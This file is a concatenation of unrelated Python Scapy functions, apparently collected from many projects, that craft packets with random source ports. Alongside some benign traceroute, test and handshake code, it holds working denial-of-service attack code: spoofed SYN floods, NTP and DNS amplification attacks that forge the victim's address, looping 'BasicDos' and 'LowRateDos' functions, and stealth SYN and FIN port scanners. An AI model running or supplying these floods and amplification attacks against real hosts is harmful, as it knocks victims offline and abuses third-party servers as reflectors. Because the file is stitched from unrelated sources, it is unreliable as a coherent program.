def UDPTraceroute(self, host): if host not in self.hosts: self.hosts.append(host) d = defer.Deferred() reactor.callLater(self.timeout, d.callback, self) for dst_port in self.dst_ports: self.sendPackets( IP(dst=host, ttl=(self.ttl_min, self.ttl_max), id=RandShort()) / UDP(dport=dst_port, sport=RandShort())) return d
def generate_ip4_frags(self, payload_length, fragment_size): p_ether = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) p_payload = UDP(sport=1234, dport=1234) / self.payload(payload_length) p_ip4 = IP(src="1.2.3.4", dst=self.pg0.remote_ip4) outer_ip4 = (p_ether / IP( src=self.pg1.remote_ip4, id=RandShort(), dst=self.pg0.local_ip4) / p_ip4 / p_payload) frags = fragment(outer_ip4, fragment_size) p4_reply = (p_ip4 / p_payload) p4_reply.ttl -= 1 return frags, p4_reply
def tread_def(target_ip, target_port, count_packet_tread, sleeptime, maximum_size, minimum_size): #global sended for _ in range(count_packet_tread): sleep(sleeptime) fake_ip = RandIP() s_eq = randint(1000, 9000) w_indow = randint(1100, 9000) ip = IP(src=fake_ip, dst=target_ip) tcp = TCP(sport=RandShort(), dport=target_port, flags="S", seq=s_eq, window=w_indow) size = Raw(b"M" * randint(minimum_size,maximum_size)) packet = ip / tcp / size send(packet , verbose=False)
def flood(target) -> None: """ Run icmp flood """ packet = IP(dst=target[0]) / TCP(dport=target[1], flags="S", seq=RandShort(), ack=RandShort(), sport=RandShort()) for i in range(4): try: send(packet, verbose=False) except Exception as e: print( f"[{red}][!] [{pink}]Error while sending 'ICMP'\n{e}[/{red}]") else: print( f"[{green}][+] [{yellow}]ICMP packet send to {target[0]} [/{green}]" )
def forge(self, job, seq): sport = 0 while sport < 1024: sport = int(RandShort()) l4 = (TCP(sport=sport, dport=job['dp'])) if ':' in job['dip']: ip = IPv6(src=self.source[1], dst=job['dip']) else: ip = IP(src=self.source[0], dst=job['dip']) if seq == 1: ip.flags = 'evil' return ip / l4
def start(self): "Sends spoofed REQ_MON_GETLIST_1 NTP packets to the target NTP servers" # Create the NTP request ip = IP(src=self.target_ipv4, dst=self.ntp_ipv4s) udp = UDP(sport=RandShort(), dport=123) ntp = NTPPrivate(mode=7, implementation="XNTPD", request_code="REQ_MON_GETLIST_1") # Continuously send the NTP requests to the target NTP servers #send(ip/udp/ntp, verbose=False, loop=True) send(ip / udp / ntp, verbose=False)
def main(args): print "[*] Comenzando el fuzzing..." pkt_lst = [] for i in xrange(args.count): ip_layer = IP(dst=args.target) # Fuzz IP layer # # Src ramdon? if random_bool(): ip_layer.src = str(RandIP()) # IP ID if random_bool(): ip_layer.id = int(RandShort()) # IP TTL if random_bool(): ip_layer.ttl = int(RandInt()) % 255 icmp_layer = ICMP() # Fuzz ICMP layer # # Type random if random_bool(): icmp_layer.type = int(RandByte()) # Seq random if random_bool(): icmp_layer.seq = int(RandShort()) pkt = ip_layer/icmp_layer pkt_lst.append(pkt) sendp(pkt_lst, inter=args.interval) print "[*] Enviado %s paquetes" % i
def build_ipsec_packet(destination_ip, destination_port): """Generate encrypted packet with spoofed source IP address. Arguments: destination_ip -- the IP address of the target destination_port -- the targets port to which the packet will be sent """ sa = SecurityAssociation(ESP, spi=0, crypt_algo='Blowfish', crypt_key=b'16byteskey', auth_algo='NULL', auth_key=None) return sa.encrypt( IP(src=RandIP(), dst=destination_ip, id=RandShort(), ttl=packet_builder.generate_ttl()) / TCP(sport=RandShort(), dport=destination_port) / packet_builder.generate_payload())
def pynmap(verbose, timeout, dst, port, ping, size): """A simple SYN scanner. """ global OPEN_PORTS start_time = time.time() if ping: ans, _ = sr(IP(dst=dst) / ICMP(id=RandShort()), verbose=0, retry=2, timeout=timeout) if not ans: elapsed = time.time() - start_time print("Note: Host seems down.") print( f"pynmap done: 1 IP address(0 hosts up) scanned in {round(elapsed)} seconds" ) return if verbose: show_info(start_info) if '-' in port: start, end = list(map(int, port.split('-'))) assert start >= 1 and end <= 65535 and start <= end, "Invalid port range" if verbose: show_info(f"Scanning {dst}[{end - start + 1} ports]") else: start = end = int(port) # only one port to scan if verbose: show_info(f"Scanning {dst}[{1} ports]") scan_range(dst, start, end, verbose=verbose, timeout=timeout, size=size) end_time = time.time() elapsed = end_time - start_time if verbose: show_info( "Completed SYN Stealth Scan", f"{round(elapsed)}s elapsed ({end - start + 1} total ports)") print(f"pynmap scan report for {dst}") print(f"Not shown: {end - start + 1 - len(OPEN_PORTS)} filtered ports") if OPEN_PORTS: print("PORT\t\tSTATE\t\tSERVICE") for port in OPEN_PORTS: port_str = str(port) + "/tcp" open_str = "open" print( f"{port_str:<8s}\t{open_str:<8s}\t{m.get(str(port), 'UNKNOWN')}" ) print() print(f"pynmap done: 1 IP address(up) scanned in {round(elapsed)} seconds")
def ntp_amplification(): global g_target_ip, g_ntp_servers # Create the NTP request ip = IP(src = g_target_ip) udp = UDP(sport = RandShort(), dport = 123) ntp = NTPPrivate(mode = 7, implementation = "XNTPD", request_code = "REQ_MON_GETLIST_1") while True: # Send the request to each of the NTP servers for ntp_ip in g_ntp_servers: ip.dst = ntp_ip packet = ip/udp/ntp send(packet)
def cmd_isn(ip, port, count, iface, graph, verbose): """Create TCP connections and print the TCP initial sequence numbers for each one. \b $ sudo habu.isn -c 5 www.portantier.com 1962287220 1800895007 589617930 3393793979 469428558 Note: You can get a graphical representation (needs the matplotlib package) using the '-g' option to better understand the randomness. """ conf.verb = False if iface: conf.iface = iface isn_values = [] for _ in range(count): pkt = IP(dst=ip)/TCP(sport=RandShort(), dport=port, flags="S") ans = sr1(pkt, timeout=0.5) if ans: send(IP(dst=ip)/TCP(sport=pkt[TCP].sport, dport=port, ack=ans[TCP].seq + 1, flags='A')) isn_values.append(ans[TCP].seq) if verbose: ans.show2() if graph: try: import matplotlib.pyplot as plt except ImportError: print("To graph support, install matplotlib") return 1 plt.plot(range(len(isn_values)), isn_values, 'ro') plt.show() else: for v in isn_values: print(v) return True
def run(self): if self._type == 0: connection = http.client.HTTPConnection(self._ip, port=self._port) headers = {'Content-type': 'application/json'} for i in range(randint(30,40)): connection.request("GET", self.get_random_string(7), headers=headers) _ = connection.getresponse() connection.close() elif self._type == 1: for i in range(randint(30,40)): l_qname = 'somedomain.com' dns_req = IP(src=self._ip, dst=OUR_DNS)/UDP(dport=53, sport=RandShort())/DNS(rd=1, qd=DNSQR(qname=l_qname)) _ = sr1(dns_req, timeout=0, verbose=0) else: pass
def forge(self, job, seq): sport = 0 while sport < 1024: sport = int(RandShort()) if self.args.connect == 'tcpsyn': l4 = (TCP(sport=sport, dport=job['dp'])) if self.args.connect == 'dnsudp': l4 = (UDP(sport=sport, dport=job['dp']) / DNS(qd=DNSQR(qname=job['domain']))) if ':' in job['dip']: ip = IPv6(src=self.source[1], dst=job['dip']) else: ip = IP(src=self.source[0], dst=job['dip']) if seq == 1: ip.flags = 'evil' return ip / l4
def run(self): global OPEN_IPS p = IP(dst = self._ip)/TCP(sport=RandShort(), dport=self._port, flags='S') resp = sr1(p, timeout=2, verbose=0) if resp is None: pass #print("[X] ip {} NOT open.".format(self._ip)) elif resp.haslayer(TCP): if resp.getlayer(TCP).flags == 0x12: #send_rst = sr(IP(dst=ip)/TCP(sport=src_port, dport=SCAN_PORT, flags='AR'), timeout=1) if not self._ip in OPEN_IPS.keys() and not self._ip == MY_IP: with LOCK: OPEN_IPS[self._ip] = {'uname':"", 'pwd':"", 'login':False, 'reported':False} print("[<<>>] IP {} open.".format(self._ip)) elif resp.getlayer(TCP).flags == 0x14: pass
def stealthScanner(IPs, ports, ttl, scrPort, timeOut): scanResults = [] if scrPort == 0: srcPort = int(RandShort()) random.shuffle(IPs) for index, tgt in enumerate(IPs): if platform == 'linux': p = Popen([ "iptables", "-A", "OUTPUT", "-p", "tcp", "--tcp-flags", "RST", "RST", "-d", str(tgt), "-j" "DROP" ]) print("working on " + str(tgt)) random.shuffle(ports) for tgtPort in ports: progress(index, len(IPs) * len(ports), tgt) stealth_scan_resp = sr1( IP(dst=str(tgt), ttl=ttl) / TCP(sport=srcPort, dport=tgtPort, flags="S"), timeout=timeOut, verbose=False) if (str(type(stealth_scan_resp)) == "<class 'NoneType'>"): scanResults.append([tgt, tgtPort, "No Response"]) elif (stealth_scan_resp.haslayer(TCP)): if (stealth_scan_resp.getlayer(TCP).flags == 0x12): send_rst = sr(IP(dst=str(tgt), ttl=ttl) / TCP(sport=srcPort, dport=tgtPort, flags="R"), timeout=timeOut, verbose=False) scanResults.append([tgt, tgtPort, "Open"]) elif (stealth_scan_resp.getlayer(TCP).flags == 0x14): scanResults.append([tgt, tgtPort, "Closed"]) elif (stealth_scan_resp.haslayer(ICMP)): if (int(stealth_scan_resp.getlayer(ICMP).type) == 3 and int(stealth_scan_resp.getlayer(ICMP).code) in [1, 2, 3, 9, 10, 13]): scanResults.append([tgt, tgtPort, "Filtered"]) if platform == 'linux': p = Popen([ "iptables", "-D", "OUTPUT", "-p", "tcp", "--tcp-flags", "RST", "RST", "-d", str(tgt), "-j" "DROP" ]) return scanResults
def check_port(ip, port, result = 1): src_port = RandShort() try: p = IP(dst=ip)/TCP(sport=src_port, dport=port, flags='F') resp = sr1(p, timeout=0.5) # Sending packet if str(type(resp)) == "<type 'NoneType'>": result = 1 elif resp.haslayer(TCP): if resp.getlayer(TCP).flags == 0x14: result = 0 #icmp is blocked elif (int(resp.getlayer(ICMP).type)==3 and int(resp.getlayer(ICMP).code) in [1,2,3,9,10,13]): result = 2 except Exception as e: pass return result
def ixfr(qname, authnameserver, serial=0, refresh=0, retry_int=0, expiry=0, ttl=0, timeout=2, retry=2): soa = '\xc0\x0c\x00\x06\x00\x01\x00\x00\x00\x00\x00\x16\x00\x00' soa += pack('!IIIII', serial, refresh, retry_int, expiry, ttl) dnsq = DNS(id=RandShort(), rd=0, ra=0, nscount=1, qd=DNSQR(qname=qname, qtype='IXFR')) / soa return _dnsxfr(authnameserver, dnsq, timeout, retry)
def start(self): """Creats the SYN packets and sends it continuously to the target ports""" # Create the IP layer ip = IP(dst=self.target_ipv4) if (self.spoof_ip is not None): ip.src = self.spoof_ip # Create the SYN tcp = TCP(sport=RandShort(), dport=self.target_ports, flags="S", seq=42) print("[*] SYN flood Started") # Continously send SYNs to the target ports send(ip / tcp, verbose=False, loop=True)
def _extra_tcp_port(self, ip_input: str, port: str, gw_mac: str): self.init_port() if '-' in port: port = self.port_handle(port) port = tuple(port) else: port = self.port_handle(port) ans, un_an = srp(Ether(src=self._mac, dst=gw_mac) / IP(dst=ip_input) / TCP(sport=int(RandShort()), dport=port, flags="S"), inter=0.1, timeout=2, iface=self._iface, verbose=0) for s, r in ans: if r[TCP].flags == 0x012: self.ip_port.append( str(r[IP].src) + ':' + str(r[TCP].sport) + ':tcp') self.port_scan_status.emit()
def syn_flooder(source_ip): global g_dest_ports print("[*] Sending SYNs to the following ports:", *g_dest_ports) # Create the IP layer if (source_ip == None): ip = IP(dst=g_target_ip) else: ip = IP(src=source_ip, dst=g_target_ip) # Create the SYN tcp = TCP(sport=RandShort(), dport=g_dest_ports, flags="S", seq=42) print("[*] Starting SYN flood") # Create the packet and continously send it to all the specified ports pkt = ip / tcp while True: send(pkt, verbose=False)
def dns_amplification(): global g_target_ip, g_name_servers, g_domain # Send the queries continuously to overwhelm the target network print("[*] Starting DNS amplification attack") while True: for name_server in g_name_servers: ip = IP(src = g_target_ip, dst = name_server) udp = UDP(sport=RandShort(), dport=53) dns = DNS(rd = 1, qd = DNSQR( qname = g_domain, qtype = "ANY" # Play around to see which one returns max answer length ) ) # Create the spoofed DNS query and send it pkt = ip/udp/dns send(pkt, verbose = False)
def syn_scan_port(host, port): # disable scapy output conf.verb = 0 srcport = RandShort() # send a SYN packet and wait for the response synack = sr1(IP(dst=host)/TCP(sport=srcport, dport=port, flags="S")) resp_flags = synack.getlayer(TCP).flags # close the connection rst = IP(dst=host)/TCP(sport=srcport, dport=port, flags='R') send(rst) # If the response was a SYNACK, the port is considered open # If the response was anything else, the port is considered closed if resp_flags == SYNACK: return "open" else: return "closed"
def udp_dns(target, count_packet_tread, dns_server_names, domains): ipId = randint(0, 0xffff) dnsId = randint(0, 0xffff) for _ in range(count_packet_tread): nameserver = choice(dns_server_names) # DNS server domain = choice(domains) # domain name ipId = randint(0, 0xffff) dnsId = randint(0, 0xffff) # packet: udp = UDP(sport=RandShort()) ip = IP(src=target, dst=nameserver, ttl=128, id=ipId) dns = DNS(rd=1, id=dnsId, qdcount=1, qd=DNSQR(qname=domain, qtype='ALL'), ar=DNSRROPT(rclass=4096)) packet = (ip / udp / dns) send(packet) #, verbose=False) ipId += 1 dnsId += 1
def LowRateDos(dest="127.0.0.1", destport=80, number_of_connections=2): """ Works in a similar way to Basic Denial of Service, main distinction is that Low rate will create a series of started connections and then just keep the connections alive without doing anything. The idea is that you cripple the network rather than knock the system offline. This will likely be a low number necessary to render a device unusable with IoT due to smaller spec internals. This is also know as RUDY - R U Dead Yet? Current Though process: Take an inputted mumber of connections, x Create x connections, record port numbers for each of these every Y seconds, send a "keep alive" packet from each port ??? Profit. """ try: import time dst_ip = dest dst_port = destport port_list = [] for con in range(1, number_of_connections + 1): src_port = RandShort() send(IP(dst=dst_ip) / TCP(sport=src_port, dport=dst_port, flags="S") / "Hello There", timeout=10, verbose=0) port_list.append(src_port) while True: time.sleep( 60 ) # Wait for a minute between sending ACK to keep connection alive for port in port_list: send(IP(dst=dst_ip) / TCP(sport=src_port, dport=dst_port, flags="S") / "Hello There", timeout=10, verbose=0) except KeyboardInterrupt: print("Detected Keyboard Interrupt, stopping...") return
def __init__(self, config: Config, save: Save, ip_s: str, ip_r: str, port_r: int, save_path: str, visit_path: str): self._nw_if = config.adp self._ack = 0 self._seq = 1 self._ip_mac = save.ip_mac self.ip_s = ip_s self.ip_r = ip_r self._port_s = int(RandShort()) self.port_r = port_r self._threads = [] self._filter_string = "tcp and src port " \ "" + str(self.port_r) + " and src host " + self.ip_r + " and dst host " \ "" + self.ip_s + " and dst port " + str(self._port_s) self._last_ack = 0 self._last_seq = 0 self._mac_r = None self._mac_s = None self.so = None self.res = None self.need_get = [] self.save_path = save_path self.visit_path = visit_path
def BasicDos(dest="127.0.0.1", sourceport=RandShort(), destport=80): """ Basic Denial of Service attack. Idea is that the function will run continuously, creating an connection initiation packet and sending it to the target IP:Port This will run very quickly in theory, due to the fact there is no delay between crafting packets. In theory this may create network connection issues on the host machine too as it is continuous crafting/sending packets. This would be on a case by case basis """ try: dst_ip = dest src_port = sourceport dst_port = destport print("Commencing Denial of Service on %s:%d" % (dst_ip, dst_port)) print("To stop attack, use Keyboard Interrupt") while True: send(IP(dst=dst_ip) / TCP(sport=src_port, dport=dst_port, flags="S") / "Hello There", timeout=10, verbose=0) except KeyboardInterrupt: print("Detected Keyboard Interrupt, stopping...") return
def cmd_isn(ip, port, count, iface, graph, verbose): conf.verb = False if iface: conf.iface = iface isn_values = [] for _ in range(count): pkt = IP(dst=ip) / TCP(sport=RandShort(), dport=port, flags="S") ans = sr1(pkt, timeout=0.5) if ans: send( IP(dst=ip) / TCP(sport=pkt[TCP].sport, dport=port, ack=ans[TCP].seq + 1, flags='A')) isn_values.append(ans[TCP].seq) if verbose: ans.show2() if graph: try: import matplotlib.pyplot as plt except ImportError: print("To graph support, install matplotlib") return 1 plt.plot(range(len(isn_values)), isn_values, 'ro') plt.show() else: for v in isn_values: print(v) return True
def tcp_handshake(dst_host, dst_port, interface, custom_tcp_opts, timeout): # Use the default interface if none is provided if interface == None: interface = conf.iface # We can use a fixed ISN seqn = 0 ip = IP(version=0x4, id=0x00fb, dst=dst_host) src_port = int(RandShort()._fix()/2+2**15) syn = ip/TCP(dport=dst_port, sport=src_port, flags='S', seq=seqn, ack=0, options=custom_tcp_opts) syn_ack = sr1(syn, timeout=timeout, iface=interface) if syn_ack == None or TCP not in syn_ack or 'R' in syn_ack[TCP].flags: return None seqn += 1 ackn = syn_ack[TCP].seq + 1 ack = ip/TCP(dport=dst_port, sport=src_port, flags='A', seq=seqn, ack=ackn) send(ack, iface=interface) return syn_ack
def start(self, verbose: bool = False): """ Scans the ports and stores the results in a list; If verbose flag is passed, the output is printed as well. """ print("[*] Starting SYN port scan") ip = IP(dst=self.target_ipv4) tcp = TCP(sport=RandShort(), dport=self.target_ports, flags="S") ans, unans = sr(ip / tcp, verbose=verbose, timeout=10) print("[*] SYN scan complete") for s, r in ans: if ("SA" == r[TCP].flags): self.open_ports.append(r[TCP].sport) for s in unans: self.filtered_ports.append(s[TCP].dport) if (verbose == True): SynScanner.print_open_ports(self) SynScanner.print_filtered_ports(self)
def __trace__(self, domain_or_ip): return sr(IP(dst=domain_or_ip, ttl=(1, 6), id=RandShort()) / TCP(flags=0x2), verbose=True)